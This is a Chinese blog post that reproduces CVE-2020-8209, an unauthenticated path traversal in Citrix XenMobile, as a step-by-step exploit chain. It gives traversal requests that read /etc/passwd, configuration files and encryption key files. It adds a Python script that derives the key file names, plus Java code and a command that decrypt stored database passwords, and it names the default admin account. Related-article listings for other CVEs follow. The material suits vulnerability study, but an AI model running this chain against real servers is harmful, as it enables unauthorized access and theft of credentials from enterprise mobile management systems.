XenMobile目录遍历任意文件读取(CVE-2020-8209)

最新推荐文章于 2022-05-14 11:56:49 发布
置顶 最新推荐文章于 2022-05-14 11:56:49 发布
阅读量2.9k 收藏 3
点赞数
文章标签: 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44146996/article/details/109756420
版权

XenMobile目录遍历任意文件读取(CVE-2020-8209)

利用此漏洞,可以读取Web服务器根目录之外的任意文件,包括配置文件和敏感的加密密钥。不需要授权。
在这里插入图片描述

POC(路径遍历)

/jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd

在这里插入图片描述

解密配置密码
读取配置

/jsp/help-sb-download.jsp?sbFileName=../../../opt/sas/sw/config/sftu.properties

在这里插入图片描述

密码已加密并以以下两种格式之一存储:{aes} [base64文本]或{aes} {db} [base64文本]。加密由库/opt/sas/sw/lib/libsecure.so和DataSecurity.jar处理。为了解密,需要相应的密钥。
它们位于文件/opt/sas/rt/keys/security.properties,可以使用路径遍历漏洞进行下载。
在这里插入图片描述
使用算法对每个参数P.TXT1,P.TXT2,P.TXT3进行哈希处理
在这里插入图片描述

test.py

from base64 import b64encode
from hashlib import sha256
print(b64encode(sha256(b'xxsbovqwtroclyjdrmgk').digest()).decode('ascii').translate({47:None,61:None}))
print(b64encode(sha256(b'zxxwzveilgqsxhphdveh').digest()).decode('ascii').translate({47:None,61:None}))
print(b64encode(sha256(b'pxicutcshrkhkyxpyvdg').digest()).decode('ascii').translate({47:None,61:None}))

在这里插入图片描述
生成三个文件dsOeANynxbfe7P0kyRVi3iQKasokNlE8HieMubzsu1Q.txt
+KRGo56ae0r6+xnuKQZaYkeJSPl5qjqJ5gs459tNg.txt
ANDHaDrHC4m3G2ut1DkkY1IM0N9ok4R6r+gEVGv9+8.txt,通过遍历下载下来。
坑点:"+"号转义为%2b

/jsp/help-sb-download.jsp?sbFileName=../../../opt/sas/rt/keys/dsOeANynxbfe7P0kyRVi3iQKasokNlE8HieMubzsu1Q.txt

在这里插入图片描述

/jsp/help-sb-download.jsp?
sbFileName=../../../opt/sas/rt/keys/+KRGo56ae0r6+xnuKQZaYkeJSPl5qjqJ5gs459tNg.txt

在这里插入图片描述

/jsp/help-sb-download.jsp?sbFileName=../../../opt/sas/rt/keys/ANDHaDrHC4m3G2ut1DkkY1IM0N9ok4R6r+gEVGv9+8.txt

在这里插入图片描述
/opt/sas/sw/lib/libsecure.so需要用于加密的库。
在这里插入图片描述
当务之急是这些文件(security.properties,dsOeANynxbfe7P0kyRVi3iQKasokNlE8HieMubzsu1Q.txt
+KRGo56ae0r6+xnuKQZaYkeJSPl5qjqJ5gs459tNg.txt
ANDHaDrHC4m3G2ut1DkkY1IM0N9ok4R6r+gEVGv9+8.txt,libsecure.so),以保存到本地。
坑点:以上5个文件必须放在对应web目录,并且opt在根目录。

在这里插入图片描述
还需要三个Java库,保存到一个文件夹:/opt/sas/sw/tomcat/inst1/webapps/ROOT/WEB-INF/lib/DataSecurity.jar,/opt/sas/sw/tomcat/inst1/webapps/ROOT/WEB-INF/lib/common-interfaces.jar,/opt/sas/sw/tomcat/inst1/webapps/ROOT/WEB-INF/lib/slf4j-api-1.6.4.jar。
在文件夹中,创建一个decrypt.class包含以下内容的文件并进行编译。
javac -cp DataSecurity.jar decrypt.java

import com.citrix.xms.security.DataSecurity;

class decrypt {
    public static void main(String[] args) {
        if (args.length < 1) {
            System.out.println("Usage:\n    decrypt [encrypted string]");
            return;
        }
        System.out.println(DataSecurity.decryptDbPassword(args[0]));
    }
}

在这里插入图片描述
通过正确排列所有数据,我们可以从配置文件中解密密码。

java -cp ./DataSecurity.jar:./common-interfaces.jar:./slf4j-api-1.6.4.jar:. decrypt {aes}{db}trsPTT4DkG9nMqXpv1Mi8H8nTQBMqqINy+G4VcMgyyE= 2>/dev/null

在这里插入图片描述
web控制台默认用户Administrator

引用文章
https://swarm.ptsecurity.com/path-traversal-on-citrix-xenmobile-server/

MD@@nr丫卡uer
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
tutemastev#PeiQi-WIKI-POC#Citrix XenMobile 任意文件读取 CVE-2020-82091
07-25
此漏洞允许未经授权的用户读取任意文件,包括包含密码的配置文件影响版本RP2之前的XenMobile服务器10.12RP4之前的XenMobile服务器10.11
CVE-2020-8209(Citrix Endpoint Management 任意文件读取
thelostworld
11-17 1153
CVE-2020-8209(Citrix Endpoint Management 任意文件读取) 一、漏洞描述: XenMobile是Citrix开发的企业移动性管理软件。该产品允许企业管理员工的移动设备和移动应用程序。该软件的目的是通过允许员工安全地在企业拥有的和个人移动设备及应用程序上工作来提高生产率。 Citrix Endpoint Management 存在 任意文件读取漏洞,远程未授权攻击者 通过 发送特制HTTP请求,可以造成 读取受影响设备上任意文件 的影响。 二、影响版本
CVE-2020-8209(Citrix Endpoint Management )XenMobile-控制台存在任意文件读取漏洞
weixin_44508748的博客
11-21 332
CVE-2020-8209,路径遍历漏洞。此漏洞允许未经授权的用户读取任意文件,包括包含密码的配置文件。(该软件国外居多,国内基本很少) RP2之前的Citrix XenMobile Server 10.12,RP4之前的Citrix XenMobile Server 10.11,RP6之前的Citrix XenMobile Server 10.10和Citrix XenMobile Server 10.9 RP5之前的访问控制不当,从而导致能够读取任意文件。 影响版本 RP2之前的XenMobile服务器
目录遍历漏洞_Citrix XenMobile目录遍历漏洞复现分析(CVE20208209
weixin_39788051的博客
12-16 413
01—漏洞背景XenMobile:Citrix Endpoint Management(也称为XenMobile)用于管理员工的移动设备和移动应用程序。通常,由于Active Directory集成,它部署在网络外围并可以访问内部网络。这使XenMobile成为安全研究的主要目标。02—漏洞复现2.1 复现环境使用环境:本地搭建的环境复现版本:无2.2 环境搭建无2.3 利用条件无2...
CVE-2020-8209 XenMobile 控制台存在任意文件读取漏洞
weixin_51387754的博客
11-10 2187
漏洞简介 产品版本: RP2之前的XenMobile服务器10.12 RP4之前的XenMobile服务器10.11 RP6之前的XenMobile服务器10.10 10.9 RP5之前的XenMobile服务器 漏洞复现 poc https://x.x.x.x:8443/jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd ...
Apache Flink目录遍历(CVE-2020-17519)批量检测脚本
09-24
Apache Flink目录遍历(CVE-2020-17519)批量检测工具 2021年1月5日,Apache Flink官方发布安全更新,修复了由蚂蚁安全非攻实验室发现提交的2个高危漏洞,漏洞之一就是Apache Flink目录遍历漏洞(CVE-2020-17519)。 ...
Apache Flink目录遍历(CVE-2020-17519)单目标检测工具
09-24
Apache Flink目录遍历(CVE-2020-17519)单目标检测工具 2021年1月5日,Apache Flink官方发布安全更新,修复了由蚂蚁安全非攻实验室发现提交的2个高危漏洞,漏洞之一就是Apache Flink目录遍历漏洞(CVE-2020-17519)。 ...
cve-2020-14750.zip9(补丁升级)
05-26
2020年11月2日,Oracle官方发布了此安全警报针对Oracle WebLogic Server中的远程代码执行漏洞CVE-2020-14750,此漏洞可以在没有身份验证的情况下进行远程攻击,也就是说,可以在不需要用户名和密码的情况下通过网络...
CVE-2020-36179:CVE-2020-36179~82 Jackson-databind SSRF&RCE
05-29
描述CVE-2020-36179:2.9.10.8之前的FasterXML jackson-databind 2.x处理与oadd.org.apache.commons.dbcp.cpdsadapter.DriverAdapterCPDS相关的序列化小工具和键入之间的交互。 CVE-2020-36180:FasterXML jackson-...
java遍历目录下所有文件_XenMobile目录遍历任意文件读取(CVE-2020-8209)
weixin_39855634的博客
12-02 109
利用此漏洞,可以读取Web服务器根目录之外的任意文件,包括配置文件和敏感的加密密钥。不需要授权。 POC(路径遍历)/jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd解密配置密码 读取配置/密码已加密并以以下两种格式之一存储:{aes} [base64文本]或{aes} {db} [base64文本]。加密由库/opt/sas/sw/l...
Citrix Endpoint Management 任意文件读取CVE-2020-8209)复现
锋刃科技的博客
11-19 473
漏洞描述 XenMobile是Citrix开发的企业移动性管理软件。该产品允许企业管理员工的移动设备和移动应用程序。该软件的目的是通过允许员工安全地在企业拥有的和个人移动设备及应用程序上工作来提高生产率。 Citrix Endpoint Management 存在 任意文件读取漏洞,远程未授权攻击者 通过 发送特制HTTP请求,可以造成 读取受影响设备上任意文件 的影响。 影响版本 RP2之前的XenMobile服务器10.12 RP4之前的XenMobile服务器10.11 RP6之前.
Citrix 修复严重漏洞,可导致 XenMobile Server 遭接管
smellycat000的专栏
08-12 610
聚焦源代码安全,网罗国内外最新资讯!编译:奇安信代码卫士团队Citrix修复了影响Citrix端点管理(CEM)本地实例XenMobile Server多个版本的5个漏洞...
目录遍历漏洞_关于 Citrix XenMobile 目录遍历漏洞(CVE20208209)的安全告知
weixin_39793576的博客
12-16 108
XenMobile(Citrix Endpoint Management)是 Citrix 开发的企业移动性管理软件,用于管理员工的移动设备和移动应用程序,其目的是通过允许员工安全地在企业拥有的和个人移动设备及应用程序上工作来提高生产率。漏洞详情近日网上公开了 Citrix XenMobile 由于输入验证不足而造成的目录遍历漏洞(CVE-2020-8209)的相关信息。远程未授权攻击者...
CVE-2020-24616: Jackson 多个反序列化安全漏洞通告
爱国小白帽
08-27 3964
360CERT [三六零CERT](javascript:void(0)???? 今天 报告编号:B6-2020-082701 报告来源:360CERT 报告作者:360CERT 更新日期:2020-08-27 0x01 漏洞简述 2020年08月27日,360CERT监测发现jackson-databind 发布了 jackson-databind 序列化漏洞 的风险通告,该漏洞编号为 CVE-2020-24616 ,漏洞等级:高危,漏洞评分:7.5。 br.com.anteros:Anteros-DB
目录遍历漏洞和任意文件下载漏洞
2ed
06-23 5187
目录浏览(目录遍历)漏洞 目录浏览漏洞是由于网站存在配置缺陷,导致网站目录可以被任意浏览,这会导致网站很多隐私文件目录泄露,比如数据库备份文件、配置文件等,攻击者利用该信息可以为进一步入侵网站做准备。 目录浏览漏洞的探测 :可以利用web漏洞扫描器扫描web应用进行检测,也可通过搜索,网站标题包含“index of”关键词的网站进行访问 目录浏览漏洞的危害:攻击者通过访问网站某一目录时,该目录没...
11-1目录遍历和敏感信息泄露原理及案例演示
山兔的博客
05-14 1658
目录遍历漏洞概述 在web功能设计中,很多时候我们会要将需要访问的文件定义成变量,从而让前端的功能变的更加灵活。 当用户发起一个前端的请求时,便会将请求的这个文件的值(比如文件名称)传递到后台,后台再执行其对应的文件。 在这个过程中,如果后台没有对前端传进来的值进行严格的安全考虑,则攻击者可能会通过“../”这样的手段让后台打开或者执行一些其他的文件。 从而导致后台服务器上其他目录文件结果被遍历出来,形成目录遍历漏洞。 ​ 看到这里,你可能会觉得目录遍历漏洞和不安全的文件下载,甚至文件包含漏洞有差
目录遍历漏洞_漏洞预警 | Citrix XenMobile 目录遍历漏洞
weixin_39854730的博客
12-16 122
0x00 漏洞编号CVE-2020-82090x01 危险等级高危0x02 漏洞概述XenMobile是Citrix开发的企业移动性管理软件,该软件的目的是通过允许员工安全地在企业拥有的和个人移动设备及应用程序上工作来提高生产率。Citrix Endpoint Management存在任意文件读取漏洞,远程未授权攻击者 通过发送特制HTTP请求,可以读取受影响设备上任意文件。POC已公...
目录遍历文件读取漏洞
小元子子的博客
06-27 4538
一些网站的业务需求,可能提供文件查看或下载功能,如果对用户查看或下载的文件不做限制,那么用户就能够查看和下载任意2文件,可以使源代码文件、敏感文件等。详细描述    目录遍历是通过操作URL强行访问web目录以外的文件目录和命令,攻击者可以在目标机器的任何位置访问文件,执行命令。    最基本的目录遍历攻击技术是在URL中使用"../"序列,改变访问资源的路径,访问到web目录以外的文件。例如:...
详细介绍一下tomcat的目录遍历漏洞(CVE-2020-1938)
最新发布
04-29
Tomcat 目录遍历漏洞(CVE-2020-1938)是一种文件包含漏洞,影响 Apache Tomcat 服务器的 AJP 协议。 AJP 协议(Apache JServ Protocol)是 Apache HTTP Server 与 Tomcat 之间通信的一种协议,可以通过 mod_jk、...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值